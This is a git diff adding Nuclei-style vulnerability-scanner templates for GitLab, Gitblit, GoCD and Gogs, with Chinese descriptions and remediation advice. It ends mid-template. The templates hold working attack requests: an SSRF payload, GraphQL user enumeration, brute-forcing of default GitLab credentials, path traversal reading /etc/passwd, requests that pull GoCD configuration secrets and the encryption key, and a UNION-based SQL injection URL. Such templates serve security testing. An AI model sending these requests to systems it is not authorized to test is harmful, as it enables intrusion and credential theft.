7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5 + - 73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d + - 77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f + - 78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab + - 79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9 + - 7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9 + - 7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5 + - 81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3 + - 83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1 + - 93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b + - 969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e + - 9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b + - 9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e + - a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528 + - a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9 + - ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5 + - ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8 + - aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b + - b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711 + - b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445 + - bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca + - be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a + - bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7 + - bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4 + - bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218 + - c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4 + - c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c + - d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71 + - d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb + - d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c + - d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f + - dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56 + - def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3 + - e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a + - e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0 + - eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687 + - ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d + - ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd + - ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83 + - f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812 + - f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649 + - f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11 + extractors: + - type: regex + regex: + - (?:application-)(\S{64})(?:\.css) + group: 1 + path: + - '{{BaseURL}}/users/sign_in' + method: GET + max-redirects: 3 + redirects: true diff --git a/config/51pwn/yaml/GitLab/CVE-2021-22214.yaml b/config/51pwn/yaml/GitLab/CVE-2021-22214.yaml new file mode 100755 index 000000000..4098979d2 --- /dev/null +++ b/config/51pwn/yaml/GitLab/CVE-2021-22214.yaml @@ -0,0 +1,59 @@ +id: CVE-2021-22214 +info: + name: Unauthenticated Gitlab SSRF - CI Lint API + author: + - l0ne1y + tags: + - cve + - cve2021 + - gitlab + - ssrf + description: |- + Gitlab 服务端请求伪造(ssrf)漏洞 + GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 + + GitLab CE EE存在安全漏洞,该漏洞源于当对内部网络的webhook请求被启用时存在请求伪造漏洞。 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-22214 + - https://nvd.nist.gov/vuln/detail/cve-2021-39935 + - https://nvd.nist.gov/vuln/detail/cve-2021-22175 + - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html + - https://docs.gitlab.com/ee/api/lint.html + severity: high + metadata: + shodan-query: http.title:"GitLab" + classification: + cve-id: + - cve-2021-22214 + - cve-2021-39935 + - cve-2021-22175 + cwe-id: + - cwe-918 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + remediation: | + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22214.json + + **临时修复方案** + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: word + part: body + words: + - does not have valid YAML syntax + path: + - '{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true' + method: POST + body: | + {"content": "include:\n remote: http://127.0.0.1:9100/test.yml"} + headers: + Content-Type: application/json + max-redirects: 3 + redirects: true diff --git a/config/51pwn/yaml/GitLab/CVE-2021-4191.yaml b/config/51pwn/yaml/GitLab/CVE-2021-4191.yaml new file mode 100755 index 000000000..d9dc6a0eb --- /dev/null +++ b/config/51pwn/yaml/GitLab/CVE-2021-4191.yaml @@ -0,0 +1,64 @@ +id: CVE-2021-4191 +info: + name: GitLab GraphQL API User Enumeration + author: + - l0ne1y + tags: + - cve + - cve2021 + - gitlab + - api + - graphql + - enum + - unauth + description: |- + GitLab Enterprise Edition和GitLab Community Edition 授权问题漏洞 + GitLab Enterprise Edition是一套内容管理系统。GitLab Community Edition是美国GitLab公司的一种社区版 GitLab 。 + + GitLab Enterprise Edition和GitLab Community Edition存在授权问题漏洞,该漏洞源于应用程序在GraphQL API中输出了过多的数据。远程攻击者可利用该漏洞获得对系统敏感信息的未经授权的访问。 + reference: + - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/ + - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191 + - https://gitlab.com/gitlab-org/gitlab/-/issues/343898 + severity: medium + classification: + cve-id: + - cve-2021-4191 + cwe-id: + - cwe-287 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/ +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"data"' + - '"users"' + - '"nodes"' + - '"id"' + - gid:// + - type: status + status: + - 200 + extractors: + - type: json + json: + - .data.users.nodes[].username + matchers-condition: and + raw: + - | + POST /api/graphql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept: */* + Origin: {{RootURL}} + Referer: {{RootURL}}/-/graphql-explorer + + {"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null} diff --git a/config/51pwn/yaml/GitLab/gitlab-api-user-enum.yaml b/config/51pwn/yaml/GitLab/gitlab-api-user-enum.yaml new file mode 100755 index 000000000..576d90117 --- /dev/null +++ b/config/51pwn/yaml/GitLab/gitlab-api-user-enum.yaml @@ -0,0 +1,47 @@ +id: gitlab-api-user-enum +info: + name: GitLab - User Information Disclosure Via Open API + author: + - l0ne1y + tags: + - gitlab + - enum + - misconfig + - disclosure + description: |- + GITLAB 未经身份验证的用户帐户及其数据枚举漏洞 + GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。其API接口允许用户未经授权查看其他用户信息,诸如使用https://URL/api/v4/users/*就能遍历出用户账户,进而可尝试爆破其他用户密码。 + reference: + - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + severity: medium + metadata: + shodan-query: http.title:"GitLab" + remediation: |- + **官方修复方案** + 修改配置文件,将"Restricted visibility levels" 设置为不允许公共访问 not allow "Public" +requests: +- matchers: + - type: regex + condition: and + part: body + regex: + - username.* + - id.* + - name.* + - type: word + part: header + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET /api/v4/users/{{uid}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Referer: {{BaseURL}} + payloads: + uid: helpers/wordlists/numbers.txt + stop-at-first-match: true diff --git a/config/51pwn/yaml/GitLab/gitlab-public-repos.yaml b/config/51pwn/yaml/GitLab/gitlab-public-repos.yaml new file mode 100755 index 000000000..064d62daf --- /dev/null +++ b/config/51pwn/yaml/GitLab/gitlab-public-repos.yaml @@ -0,0 +1,38 @@ +id: gitlab-public-repos +info: + name: GitLab public repositories + author: + - l0ne1y + tags: + - gitlab + - exposure + - misconfig + description: |- + Gitlab 仓库(repositories)可任意访问 + GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 + 当其访问权限配置为public时,任何公众都可访问其仓库信息,可能造成源代码泄漏。 + reference: + - https://twitter.com/ldionmarcil/status/1370052344562470922 + - /~https://github.com/ldionmarcil/gitlab-unauth-parser + severity: info + metadata: + shodan-query: http.title:"GitLab" + remediation: |- + **官方修复方案** + 修改配置文件,将"Restricted visibility levels" 设置为不允许公共访问 not allow "Public" +requests: +- matchers: + - type: word + part: header + words: + - 'Set-Cookie: _gitlab_session=' + - type: word + part: body + words: + - name_with_namespace + matchers-condition: and + path: + - '{{BaseURL}}/api/v4/projects' + method: GET + headers: + Cookie: _gitlab_session= diff --git a/config/51pwn/yaml/GitLab/gitlab-public-snippets.yaml b/config/51pwn/yaml/GitLab/gitlab-public-snippets.yaml new file mode 100755 index 000000000..016e7bdf9 --- /dev/null +++ b/config/51pwn/yaml/GitLab/gitlab-public-snippets.yaml @@ -0,0 +1,41 @@ +id: gitlab-public-snippets +info: + name: GitLab public snippets + author: + - l0ne1y + tags: + - gitlab + - exposure + - misconfig + description: |- + Gitlab 代码片段(snippets)可任意访问 + GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 + 当其访问权限配置为public时,任何公众都可访问其分享的代码片段,可能造成源代码泄漏。 + reference: + - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10 + - https://twitter.com/intigriti/status/1375078783338876929 + severity: info + metadata: + shodan-query: http.title:"GitLab" + remediation: |- + **官方修复方案** + 修改配置文件,将"Restricted visibility levels" 设置为不允许公共访问 not allow "Public" +requests: +- matchers: + - type: word + words: + - Snippets · Explore · GitLab + - type: status + status: + - 200 + - type: word + condition: or + negative: true + words: + - No snippets found + - Nothing here. + matchers-condition: and + path: + - '{{BaseURL}}/explore/snippets' + - '{{BaseURL}}/-/snippets' + method: GET diff --git a/config/51pwn/yaml/GitLab/gitlab-uninitialized-password.yaml b/config/51pwn/yaml/GitLab/gitlab-uninitialized-password.yaml new file mode 100755 index 000000000..42cb800ad --- /dev/null +++ b/config/51pwn/yaml/GitLab/gitlab-uninitialized-password.yaml @@ -0,0 +1,48 @@ +id: gitlab-uninitialized-password +info: + name: Uninitialized GitLab instances + author: + - l0ne1y + tags: + - gitlab + - misconfig + - unauth + description: |- + Gitlab 未授权密码修改漏洞 + GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 + 在版本 14 之前,GitLab 安装需要 root 密码通过 Web UI 设置。如果管理员跳过这一步,任何访客可以重置root密码并控制实例。 + reference: + - https://gitlab.com/gitlab-org/gitlab/-/issues/211328 + - https://gitlab.com/gitlab-org/omnibus-gitlab/-/merge_requests/5331 + - https://docs.gitlab.com/omnibus/installation/#set-up-the-initial-password + severity: high + metadata: + shodan-query: http.title:"GitLab" + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + part: body + words: + - Change your password + - New password + - Confirm new password + - type: word + part: header + words: + - gitlab_session + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/users/sign_in' + method: GET + max-redirects: 2 + redirects: true diff --git a/config/51pwn/yaml/GitLab/gitlab-weak-login.yaml b/config/51pwn/yaml/GitLab/gitlab-weak-login.yaml new file mode 100755 index 000000000..a7d96166d --- /dev/null +++ b/config/51pwn/yaml/GitLab/gitlab-weak-login.yaml @@ -0,0 +1,63 @@ +id: gitlab-weak-login +info: + name: Gitlab Default Login + author: + - l0ne1y + tags: + - gitlab + - default-login + description: |- + GitLab默认口令登录漏洞 + GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 + + GitLab web管理后台存在默认账户"root"、"admin"、"admin@local.host"和默认密码"5iveL!fe"、"123456789"。 + reference: + - https://twitter.com/0xmahmoudjo0/status/1467394090685943809 + - https://git-scm.com/book/en/v2/git-on-the-server-gitlab + severity: high + metadata: + shodan-query: http.title:"GitLab" + classification: + cwe-id: + - cwe-798 + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/json + - type: word + condition: and + part: body + words: + - '"access_token":' + - '"token_type":' + - '"refresh_token":' + matchers-condition: and + raw: + - | + POST /oauth/token HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Referer: {{BaseURL}} + content-type: application/json + + {"grant_type":"password","username":"{{username}}","password":"{{password}}"} + attack: clusterbomb + payloads: + password: + - 5iveL!fe + - "123456789" + username: + - root + - admin + - admin@local.host diff --git a/config/51pwn/yaml/Gitblit/CVE-2022-31268.yaml b/config/51pwn/yaml/Gitblit/CVE-2022-31268.yaml new file mode 100755 index 000000000..0378179c2 --- /dev/null +++ b/config/51pwn/yaml/Gitblit/CVE-2022-31268.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-31268 +info: + name: Gitblit 1.9.3路径遍历漏洞 + author: + - zxcv + description: |+ + Gitblit 1.9.3 路径遍历漏洞 + Gitblit 是一个开源的纯 Java Git 解决方案,用于管理、查看和提供Git存储库。Gitblit V1.9.3 中存在一个路径遍历漏洞,目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web根目录以外的文件)。 + + reference: + - /~https://github.com/metastor/vuls/blob/main/gitblit/gitblit%20v1.9.3%20path%20traversal/gitblit%20v1.9.3%20path%20traversal.md + severity: medium + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - + - java.sun.com + - gitblit.properties + - type: word + part: header + words: + - application/xml + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/resources//../WEB-INF/web.xml' + method: GET diff --git a/config/51pwn/yaml/GoCD/CVE-2021-43287.yaml b/config/51pwn/yaml/GoCD/CVE-2021-43287.yaml new file mode 100755 index 000000000..2bd27effd --- /dev/null +++ b/config/51pwn/yaml/GoCD/CVE-2021-43287.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-43287 +info: + name: Pre-Auth Takeover of Build Pipelines in GoCD + author: + - l0ne1y + description: |- + GoCD Business Continuity 任意文件读取漏洞 + GoCD 是一个开源的持续集成和持续交付系统,可以在持续交付过程中执行编译,自动化测试,自动部署等等。 + ​GoCD Business Continuity 存在任意文件读取漏洞,未经身份验证的攻击者可以利用该漏洞来接管 CI/CD 管道,最终可在未授权的情况下造成任意文件读取,获取敏感API密钥等信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.gocd.org/releases/#21-3-0 + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + regex: + - root:.*:0:0:.* + - type: regex + regex: + - bin:*:1:1:bin:.* + matchers-condition: and + path: + - '{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/GoCD/gocd-cruise-configuration.yaml b/config/51pwn/yaml/GoCD/gocd-cruise-configuration.yaml new file mode 100755 index 000000000..ccf0618ac --- /dev/null +++ b/config/51pwn/yaml/GoCD/gocd-cruise-configuration.yaml @@ -0,0 +1,40 @@ +id: gocd-cruise-configuration +info: + name: GoCd Cruise Configuration disclosure + author: + - l0ne1y + description: |- + GoCd 配置文件泄露 + ThoughtWorks GoCD是美国ThoughtWorks公司的一个免费和开源的 CI/CD 服务器。 + GoCD cruise配置文件可于外部网络访问,获取配置信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.gocd.org/ + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - server agentAutoRegisterKey + - webhookSecret + - tokenGenerationKey + matchers-condition: and + path: + - '{{BaseURL}}/go/add-on/business-continuity/api/cruise_config' + method: GET diff --git a/config/51pwn/yaml/GoCD/gocd-encryption-key.yaml b/config/51pwn/yaml/GoCD/gocd-encryption-key.yaml new file mode 100755 index 000000000..830bed5dd --- /dev/null +++ b/config/51pwn/yaml/GoCD/gocd-encryption-key.yaml @@ -0,0 +1,41 @@ +id: gocd-encryption-key +info: + name: GoCd Encryption Key + author: + - l0ne1y + description: |- + GoCd Encryption Key泄露 + ThoughtWorks GoCD是美国ThoughtWorks公司的一个免费和开源的 CI/CD 服务器。 + GoCd Encryption Key访问控制不当,可进行获取。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.gocd.org/ + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + regex: + - ([a-z0-9]){32} + - type: word + part: header + words: + - text/plain + matchers-condition: and + path: + - '{{BaseURL}}/go/add-on/business-continuity/api/cipher.aes' + method: GET diff --git a/config/51pwn/yaml/GoCD/gocd-login.yaml b/config/51pwn/yaml/GoCD/gocd-login.yaml new file mode 100755 index 000000000..ad1a9fdce --- /dev/null +++ b/config/51pwn/yaml/GoCD/gocd-login.yaml @@ -0,0 +1,36 @@ +id: gocd-login +info: + name: GoCD Login + author: + - l0ne1y + tags: + - go + - panel + - gocd + description: |- + GoCD 默认登陆页 + ThoughtWorks GoCD是美国ThoughtWorks公司的一个免费和开源的 CI/CD 服务器。 + GoCD安全配置不当,默认登陆页面地址未更改。 + severity: info + metadata: + shodan-query: html:"GoCD Version" + remediation: |- + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: word + words: + - Login - Go + - gocd-params + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/go/auth/login' + method: GET diff --git a/config/51pwn/yaml/GoCD/gocd-unauth-dashboard.yaml b/config/51pwn/yaml/GoCD/gocd-unauth-dashboard.yaml new file mode 100755 index 000000000..f6e44e1d1 --- /dev/null +++ b/config/51pwn/yaml/GoCD/gocd-unauth-dashboard.yaml @@ -0,0 +1,40 @@ +id: gocd-unauth-dashboard +info: + name: GoCd Unauth Dashboard + author: + - l0ne1y + tags: + - go + - gocd + - unauth + - misconfig + description: |- + GoCd 默认仪表页泄露 + ThoughtWorks GoCD是美国ThoughtWorks公司的一个免费和开源的 CI/CD 服务器。 + GoCD 安全配置不当,默认Dashboard页面泄露。 + severity: medium + metadata: + shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + remediation: |- + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: word + words: + - Create a pipeline - Go + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/go/admin/pipelines/create?group=defaultGroup' + method: GET diff --git a/config/51pwn/yaml/Gogs/CVE-2014-8682.yaml b/config/51pwn/yaml/Gogs/CVE-2014-8682.yaml new file mode 100755 index 000000000..b5ae3719c --- /dev/null +++ b/config/51pwn/yaml/Gogs/CVE-2014-8682.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-8682 +info: + name: Gogs (Go Git Service) - SQL Injection + author: + - l0ne1y + description: "Gogs SQL注入漏洞 \n Gogs(又名Go Git Service)是Gogs团队开发的一个基于Go语言的自助Git托管服务,它支持创建、迁移公开/私有仓库,添加、删除仓库协作者等。\n\nGogs + 0.3.1-9版本至0.5.6.1105 Beta之前0.5.x版本中存在SQL注入漏洞。远程攻击者可借助‘q’参数利用该漏洞执行任意SQL命令。 " + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + http://gogs.io/docs/intro/change_log.html + + 临时修复方案:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"ok":true' + - '"data"' + - '"repolink":"' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27' + method: GET diff --git a/config/51pwn/yaml/Gogs/CVE-2018-18925.yaml b/config/51pwn/yaml/Gogs/CVE-2018-18925.yaml new file mode 100755 index 000000000..937796e67 --- /dev/null +++ b/config/51pwn/yaml/Gogs/CVE-2018-18925.yaml @@ -0,0 +1,55 @@ +id: CVE-2018-18925 +info: + name: Gogs (Go Git Service) 0.11.66 - Remote Code Execution + author: + - princechaddha + tags: + - cve + - cve2018 + - gogs + - lfi + - rce + description: | + Gogs 任意用户登录漏洞 + + Gogs 0.11.66 允许远程代码执行,因为它没有正确验证会话 ID,正如 file.go 中文件会话提供程序中的“..”会话文件伪造所证明的那样。这与 Macaron 的 go-macaron/session 代码中的 session ID 处理有关。 + reference: + - https://www.anquanke.com/post/id/163575 + - /~https://github.com/vulhub/vulhub/tree/master/gogs/cve-2018-18925 + - https://nvd.nist.gov/vuln/detail/cve-2018-18925 + - /~https://github.com/gogs/gogs/issues/5469 + severity: critical + classification: + cve-id: + - cve-2018-18925 + cwe-id: + - cwe-384 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/gogs/gogs/issues/5469 + + 临时修复方案: + 